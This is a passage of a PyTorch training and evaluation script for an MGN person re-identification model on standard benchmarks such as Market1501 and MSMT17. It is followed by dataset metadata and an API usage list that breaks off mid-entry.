InfiniteNextBatch(DataLoader(cd_train_dataset,\n batch_size=args.cd_train_batch_size,\n num_workers=num_workers, drop_last=True))\n\n test_transform = transforms.Compose([\n transforms.Resize((384, 128)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n test_flip_transform = transforms.Compose([\n transforms.Resize((384, 128)),\n functional.hflip,\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n def make_test_loader_M_C_D(root, name):\n query_dataset = Market1501(root + '/query', transform=test_transform, training=False, kpt_file=name+'-kpt.pkl' if args.pap else None)\n query_flip_dataset = Market1501(root + '/query', transform=test_flip_transform, training=False, kpt_file=name+'-kpt.pkl' if args.pap else None)\n query_loader = DataLoader(query_dataset, batch_size=batch_test, num_workers=num_workers)\n query_flip_loader = DataLoader(query_flip_dataset, batch_size=batch_test, num_workers=num_workers)\n\n test_dataset = Market1501(root + 
'/bounding_box_test', transform=test_transform, training=False, kpt_file=name+'-kpt.pkl' if args.pap else None)\n test_flip_dataset = Market1501(root + '/bounding_box_test', transform=test_flip_transform, training=False, kpt_file=name+'-kpt.pkl' if args.pap else None)\n test_loader = DataLoader(test_dataset, batch_size=batch_test, num_workers=num_workers)\n test_flip_loader = DataLoader(test_flip_dataset, batch_size=batch_test, num_workers=num_workers)\n return query_loader, query_flip_loader, test_loader, test_flip_loader\n\n def make_test_loader_MS_PR_PI(name):\n ps_kwargs = {'use_ps': False}\n if name == 'msmt17':\n dclass = MSMT17\n ps_kwargs = {'ps_dir': 'msmt17/MSMT17_V1_ps_label'}\n elif name == 'partial_reid':\n dclass = PartialREID\n elif name == 'partial_ilids':\n dclass = PartialiLIDs\n else:\n raise ValueError('Invalid dataset name {}'.format(name))\n q_set = dclass(transform=test_transform, training=False, use_kpt=args.pap, split='query', **ps_kwargs)\n q_flip_set = dclass(transform=test_flip_transform, training=False, use_kpt=args.pap, split='query', **ps_kwargs)\n q_loader = DataLoader(q_set, batch_size=batch_test, num_workers=num_workers)\n q_flip_loader = DataLoader(q_flip_set, batch_size=batch_test, num_workers=num_workers)\n\n g_set = dclass(transform=test_transform, training=False, use_kpt=args.pap, split='gallery', **ps_kwargs)\n g_flip_set = dclass(transform=test_flip_transform, training=False, use_kpt=args.pap, split='gallery', **ps_kwargs)\n g_loader = DataLoader(g_set, batch_size=batch_test, num_workers=num_workers)\n g_flip_loader = DataLoader(g_flip_set, batch_size=batch_test, num_workers=num_workers)\n\n return q_loader, q_flip_loader, g_loader, g_flip_loader\n\n def make_test_loader(name):\n if name in ['market1501', 'cuhk03', 'duke']:\n return make_test_loader_M_C_D(get_dataset_root(name), name)\n elif name in ['msmt17', 'partial_reid', 'partial_ilids']:\n return make_test_loader_MS_PR_PI(name)\n\n test_loaders = [make_test_loader(name) for name in testset_names]\n\n mgn = MGN(len(train_dataset.unique_ids), args, ps_n_classes)\n if torch.cuda.device_count() > 1:\n mgn = nn.DataParallel(mgn)\n mgn = mgn.to(DEVICE)\n vanilla_cross_entropy_loss = nn.CrossEntropyLoss()\n cross_entropy_loss = nn.CrossEntropyLoss(reduce=False)\n triplet_semihard_loss = TripletSemihardLoss(margin=0.1, DEVICE = DEVICE, sampling = sampling, batch_id = batch_id, batch_image = batch_image) #batch_hard, .'curriculum'\n ps_loss = PSLoss()\n\n optimizer_start1 = optim.SGD(mgn.parameters(), lr=lr_1, momentum=0.9, weight_decay=weight_decay)\n optimizer_start2 = optim.SGD(mgn.parameters(), lr=lr_2, momentum=0.9, weight_decay=weight_decay)\n scheduler_1 = optim.lr_scheduler.MultiStepLR(optimizer_start1, [140, 180], gamma=0.1)\n scheduler_2 = optim.lr_scheduler.MultiStepLR(optimizer_start2, [140, 180], gamma=0.1) # best [140, 180] [120, 160]\n\n def get_model_input(inputs, target):\n dic = {'im': inputs.to(DEVICE)}\n if 'pap_mask_2p' in target:\n dic['pap_mask_2p'] = target['pap_mask_2p'].to(DEVICE)\n dic['pap_mask_3p'] = target['pap_mask_3p'].to(DEVICE)\n return dic\n\n def extract_loader_feat(loader, verbose=False):\n feat = []\n vis = []\n i = 0\n for inputs, target in loader:\n if verbose:\n print(i)\n i += 1\n with torch.no_grad():\n output = mgn(get_model_input(inputs, target))\n feat.append(output[1].detach().cpu().numpy())\n if args.pap:\n vis_ = np.concatenate([np.ones([len(output[1]), 3]), torch.stack(output[5+3+5:5+3+5+5], 1).detach().cpu().numpy()], 1)\n vis.append(vis_)\n feat = 
np.concatenate(feat)\n vis = np.concatenate(vis) if args.pap else None\n return feat, vis\n\n def test(query_loader, query_flip_loader, test_loader, test_flip_loader, trainset_name, testset_name, epoch, verbose=False):\n cache_file = '{}/feat_cache-{}_to_{}.pkl'.format(exp_dir, trainset_name, testset_name)\n if args.use_feat_cache:\n assert os.path.exists(cache_file), \"Feature cache file {} does not exist!\".format(cache_file)\n query_2, q_vis, query_flip_2, q_vis, test_2, test_vis, test_flip_2, test_vis, q_ids, q_cams, g_ids, g_cams = load_pickle(cache_file)\n else:\n query_2, q_vis = extract_loader_feat(query_loader, verbose=verbose)\n query_flip_2, q_vis = extract_loader_feat(query_flip_loader, verbose=verbose)\n\n test_2, test_vis = extract_loader_feat(test_loader, verbose=verbose)\n test_flip_2, test_vis = extract_loader_feat(test_flip_loader, verbose=verbose)\n\n q_ids = query_loader.dataset.ids\n q_cams = query_loader.dataset.cameras\n g_ids = test_loader.dataset.ids\n g_cams = test_loader.dataset.cameras\n save_pickle([query_2, q_vis, query_flip_2, q_vis, test_2, test_vis, test_flip_2, test_vis, q_ids, q_cams, g_ids, g_cams], cache_file)\n\n if args.test_which_feat > 0:\n # TODO: implement for pap\n idx = args.test_which_feat\n query_2 = query_2[:, 256*idx-256:256*idx]\n query_flip_2 = query_flip_2[:, 256*idx-256:256*idx]\n test_2 = test_2[:, 256*idx-256:256*idx]\n test_flip_2 = test_flip_2[:, 256*idx-256:256*idx]\n\n query = normalize(query_2 + query_flip_2)\n test = normalize(test_2 + test_flip_2)\n\n if verbose:\n print('query.shape:', query.shape)\n print('test.shape:', test.shape)\n if args.pap:\n print('q_vis.shape:', q_vis.shape)\n print('test_vis.shape:', test_vis.shape)\n\n if args.pap:\n dist_1 = compute_dist_with_visibility(query, test, q_vis, test_vis, dist_type='euclidean', avg_by_vis_num=False)\n else:\n dist_1 = cdist(query, test)\n r_1 = cmc(dist_1, q_ids, g_ids, q_cams, g_cams,\n separate_camera_set=False,\n single_gallery_shot=False,\n first_match_break=True)\n m_ap_1 = mean_ap(dist_1, q_ids, g_ids, q_cams, g_cams)\n print('EPOCH [%d] %s -> %s: mAP=%f, r@1=%f, r@3=%f, r@5=%f, r@10=%f' % (epoch + 1, trainset_name, testset_name, m_ap_1, r_1[0], r_1[2], r_1[4], r_1[9]))\n\n if args.only_test:\n mgn.eval()\n if not args.use_feat_cache:\n if args.model_weight_file:\n model_weight_file = args.model_weight_file\n else:\n model_weight_file = '{}/model_weight.pth'.format(exp_dir)\n load_model_weight((mgn.module if hasattr(mgn, 'module') else mgn), model_weight_file)\n for name, test_loader in zip(testset_names, test_loaders):\n test(test_loader[0], test_loader[1], test_loader[2], test_loader[3], trainset_name, name, -1, verbose=False)\n exit()\n\n for epoch in range(epochs):\n mgn.train()\n scheduler_1.step()\n scheduler_2.step()\n running_loss = 0.0\n running_loss_1 = 0.0\n running_loss_2 = 0.0\n if epoch < 20:\n optimizer_1 = optim.SGD(mgn.parameters(), lr=0.01+0.0045*epoch, momentum=0.9, weight_decay=weight_decay)\n optimizer_2 = optim.SGD(mgn.parameters(), lr=0.001+0.00045*epoch, momentum=0.9, weight_decay=weight_decay) \n else:\n optimizer_1 = optimizer_start1\n optimizer_2 = optimizer_start2\n \n for i, data in enumerate(train_loader):\n inputs, target = data\n inputs = inputs.to(DEVICE)\n for k, v in target.items():\n target[k] = v.to(DEVICE)\n labels = target['id']\n outputs = mgn(get_model_input(inputs, target))\n optimizer_1.zero_grad()\n if args.pap:\n losses_1 = [vanilla_cross_entropy_loss(output, labels) for output in outputs[5:5+3]] + 
[(cross_entropy_loss(output, labels) * v).sum() / (v.sum() + 1e-12) for output, v in zip(outputs[5+3:5+3+5], outputs[5+3+5:5+3+5+5])]\n else:\n losses_1 = [vanilla_cross_entropy_loss(output, labels) for output in outputs[5:5+8]]\n loss_1 = sum(losses_1) / len(losses_1)\n psl = 0\n if args.src_ps_lw > 0:\n psl = (ps_loss(outputs[-3], target['ps_label']) + ps_loss(outputs[-2], target['ps_label']) + ps_loss(outputs[-1], target['ps_label'])) / 3.\n (loss_1 + psl * args.src_ps_lw).backward()\n if args.cd_ps_lw > 0:\n cd_inputs, cd_targets = cd_train_loader.next_batch()\n cd_inputs = cd_inputs.to(DEVICE)\n for k, v in cd_targets.items():\n cd_targets[k] = v.to(DEVICE)\n pap_old = args.pap\n args.pap = False\n outputs = mgn(get_model_input(cd_inputs, cd_targets))\n args.pap = pap_old\n cd_psl = (ps_loss(outputs[-3], cd_targets['ps_label']) + ps_loss(outputs[-2], cd_targets['ps_label']) + ps_loss(outputs[-1], cd_targets['ps_label'])) / 3.\n (cd_psl * args.cd_ps_lw).backward()\n optimizer_1.step()\n\n outputs = mgn(get_model_input(inputs, target))\n optimizer_2.zero_grad()\n losses_2 = [triplet_semihard_loss(output, labels, epoch) for output in outputs[2:5]]\n loss_2 = sum(losses_2) / len(losses_2)\n psl = 0\n if args.src_ps_lw > 0:\n psl = (ps_loss(outputs[-3], target['ps_label']) + ps_loss(outputs[-2], target['ps_label']) + ps_loss(outputs[-1], target['ps_label'])) / 3.\n (loss_2 + psl * args.src_ps_lw).backward()\n if args.cd_ps_lw > 0:\n cd_inputs, cd_targets = cd_train_loader.next_batch()\n cd_inputs = cd_inputs.to(DEVICE)\n for k, v in cd_targets.items():\n cd_targets[k] = v.to(DEVICE)\n pap_old = args.pap\n args.pap = False\n outputs = mgn(get_model_input(cd_inputs, cd_targets))\n args.pap = pap_old\n cd_psl = (ps_loss(outputs[-3], cd_targets['ps_label']) + ps_loss(outputs[-2], cd_targets['ps_label']) + ps_loss(outputs[-1], cd_targets['ps_label'])) / 3.\n (cd_psl * args.cd_ps_lw).backward()\n optimizer_2.step()\n\n running_loss_1 += loss_1.item()\n running_loss_2 += loss_2.item()\n running_loss = running_loss + (loss_1.item() + loss_2.item())/2.0\n\n print('%d/%d - %d/%d - loss: %f - ps_loss: %f - cd_ps_loss: %f' % (epoch + 1, epochs, i, len(train_loader), (loss_1.item() + loss_2.item())/2, psl.item() if isinstance(psl, torch.Tensor) else 0, cd_psl.item() if args.cd_ps_lw > 0 else 0))\n print('epoch: %d/%d - loss1: %f' % (epoch + 1, epochs, running_loss_1 / len(train_loader)))\n print('epoch: %d/%d - loss2: %f' % (epoch + 1, epochs, running_loss_2 / len(train_loader)))\n\n # if (epoch + 1) % 50 == 0:\n # model_weight_file = '{}/model_weight.pth'.format(exp_dir)\n # save_model(mgn, model_weight_file)\n # mgn.eval()\n # for name, test_loader in zip(testset_names, test_loaders):\n # test(test_loader[0], test_loader[1], test_loader[2], test_loader[3], trainset_name, name, epoch)\n model_weight_file = '{}/model_weight.pth'.format(exp_dir)\n save_model(mgn, model_weight_file)\n mgn.eval()\n for name, test_loader in zip(testset_names, test_loaders):\n test(test_loader[0], test_loader[1], test_loader[2], test_loader[3], trainset_name, name, epoch)\n\n\nclass CommaSeparatedSeq(object):\n def __init__(self, seq_class=tuple, func=int):\n self.seq_class = seq_class\n self.func = func\n\n def __call__(self, s):\n return self.seq_class([self.func(i) for i in s.split(',')])\n\n\ndef str2bool(v):\n \"\"\"From https://github.com/amdegroot/ssd.pytorch\"\"\"\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\n\nif __name__ == '__main__':\n print('Used Python:', sys.executable)\n parser = 
argparse.ArgumentParser()\n parser.add_argument('-i', '--gpuId', type=str, default='0', help='input gpu id')\n parser.add_argument('-e', '--epochs', type=int, default=200, help='input training epochs')\n parser.add_argument('-w', '--weight_decay', type=float, default=5e-4)\n parser.add_argument('--batch_id', type=int, default=2)\n parser.add_argument('--batch_image', type=int, default=4)\n parser.add_argument('--lr_1', type=float, default = .1)\n parser.add_argument('--lr_2', type=float, default = .01)\n parser.add_argument('--rand_crop', type=eval, default=True, help='Either True or False')\n parser.add_argument('--erasing_p', type=float, default = 0.5)\n parser.add_argument('--sampling', type=str, default = 'batch_hard')\n parser.add_argument('--exp_dir', type=str)\n parser.add_argument('--trainset_name', type=str)\n parser.add_argument('--cd_trainset_name', type=str)\n parser.add_argument('--cd_train_batch_size', type=int, default=16*8)\n parser.add_argument('--head_1part_stride', type=int, default=2)\n parser.add_argument('--pap', type=eval, default=False, help='Either True or False')\n parser.add_argument('--src_ps_lw', type=float, default=0)\n parser.add_argument('--cd_ps_lw', type=float, default=0)\n parser.add_argument('--only_test', type=eval, default=False, help='Either True or False')\n parser.add_argument('--model_weight_file', type=str, default='')\n parser.add_argument('--testset_names', type=CommaSeparatedSeq(list, str), default=['market1501', 'cuhk03', 'duke', 'msmt17'])\n parser.add_argument('--ps_head_arch', type=str, default='PartSegHeadDeconvConv')\n parser.add_argument('--ps_fuse_type', type=str, default='None')\n parser.add_argument('--use_feat_cache', type=str2bool, default=False)\n parser.add_argument('--test_which_feat', type=int, default=-1, help='Either -1 or one of 1,2,3,4,5,6,7,8')\n parser.add_argument('--ps_label_root', type=str, default='None')\n\n args = parser.parse_args()\n print(args)\n time_start = time.time()\n run(args)\n elapsed = round(time.time() - time_start)\n elapsed = str(datetime.timedelta(seconds=elapsed))\n print('Elapsed {}'.format(elapsed))\n", "sub_path": "mgn_pap_ps_erase_ps_label.py", "file_name": "mgn_pap_ps_erase_ps_label.py", "file_ext": "py", "file_size_in_byte": 31439, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn.Module", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torchvision.models.resnet.resnet50", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torchvision.models.resnet.Bottleneck", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 
63, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 63, "usage_type": "call"}, {"api_name": "torchvision.models.resnet.Bottleneck", "line_number": 64, "usage_type": "call"}, {"api_name": "torchvision.models.resnet.Bottleneck", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 81, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 83, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 84, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 88, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 90, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 91, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 92, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 93, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 94, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 95, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 96, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 104, "usage_type": 
"call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 124, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 125, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 126, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.nn.init.normal_", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 140, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 140, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 141, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 141, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 145, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 145, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 146, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 146, "usage_type": "name"}, {"api_name": "torch.nn.init.kaiming_normal_", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 150, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 150, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 151, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 151, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 152, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 152, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 156, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 157, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 157, "usage_type": "name"}, {"api_name": "pa_pool.pa_max_pool", "line_number": 176, "usage_type": "call"}, {"api_name": 
"torch.nn.functional.max_pool2d", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 180, "usage_type": "name"}, {"api_name": "pa_pool.pa_max_pool", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.nn.functional.max_pool2d", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 189, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 226, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 240, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path", "line_number": 241, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 242, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 245, "usage_type": "call"}, {"api_name": "os.path", "line_number": 245, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 246, "usage_type": "call"}, {"api_name": "os.path", "line_number": 246, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 293, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Resize", "line_number": 299, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 299, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomCrop", "line_number": 299, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 301, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 301, "usage_type": "name"}, {"api_name": "random_erasing_w_ps_label.RandomErasingWithPS", "line_number": 303, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 304, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 304, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 305, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 305, "usage_type": "name"}, {"api_name": "market1501_erase_ps_label.Market1501", "line_number": 338, "usage_type": "call"}, {"api_name": "msmt17_erase_ps_label.MSMT17", "line_number": 352, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 364, "usage_type": "call"}, {"api_name": "market1501_erase_ps_label.RandomIdSampler", "line_number": 365, "usage_type": "call"}, {"api_name": "market1501_erase_ps_label.Market1501", "line_number": 373, "usage_type": "call"}, {"api_name": "msmt17_erase_ps_label.MSMT17", "line_number": 375, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 378, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 382, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 382, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 383, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 383, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", 
"line_number": 384, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 384, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 385, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 385, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 387, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 387, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 388, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 388, "usage_type": "name"}, {"api_name": "torchvision.transforms.functional.hflip", "line_number": 389, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.functional", "line_number": 389, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 390, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 390, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 391, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 391, "usage_type": "name"}, {"api_name": "market1501_erase_ps_label.Market1501", "line_number": 395, "usage_type": "call"}, {"api_name": "market1501_erase_ps_label.Market1501", "line_number": 396, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 397, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 398, "usage_type": "call"}, {"api_name": "market1501_erase_ps_label.Market1501", "line_number": 400, "usage_type": "call"}, {"api_name": "market1501_erase_ps_label.Market1501", "line_number": 401, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 402, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 403, "usage_type": "call"}, {"api_name": "msmt17_erase_ps_label.MSMT17", "line_number": 409, "usage_type": "name"}, {"api_name": "partial_reid.PartialREID", "line_number": 412, "usage_type": "name"}, {"api_name": "partial_ilids.PartialiLIDs", "line_number": 414, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 419, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 420, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 424, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 425, "usage_type": "call"}, {"api_name": "torch.cuda.device_count", "line_number": 438, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 438, "usage_type": "attribute"}, {"api_name": "torch.nn.DataParallel", "line_number": 439, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 439, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 441, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 441, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 442, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 442, "usage_type": "name"}, {"api_name": "easy2hard_triplet.TripletSemihardLoss", "line_number": 443, "usage_type": "call"}, {"api_name": "ps_loss.PSLoss", "line_number": 444, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 446, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 446, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 447, "usage_type": "call"}, {"api_name": 
"torch.optim", "line_number": 447, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.MultiStepLR", "line_number": 448, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 448, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 448, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.MultiStepLR", "line_number": 449, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 449, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 449, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 466, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 470, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 470, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 470, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 472, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 473, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 479, "usage_type": "call"}, {"api_name": "os.path", "line_number": 479, "usage_type": "attribute"}, {"api_name": "file_utils.load_pickle", "line_number": 480, "usage_type": "call"}, {"api_name": "file_utils.save_pickle", "line_number": 492, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 502, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 503, "usage_type": "call"}, {"api_name": "np_distance.compute_dist_with_visibility", "line_number": 513, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 515, "usage_type": "call"}, {"api_name": "__init__.cmc", 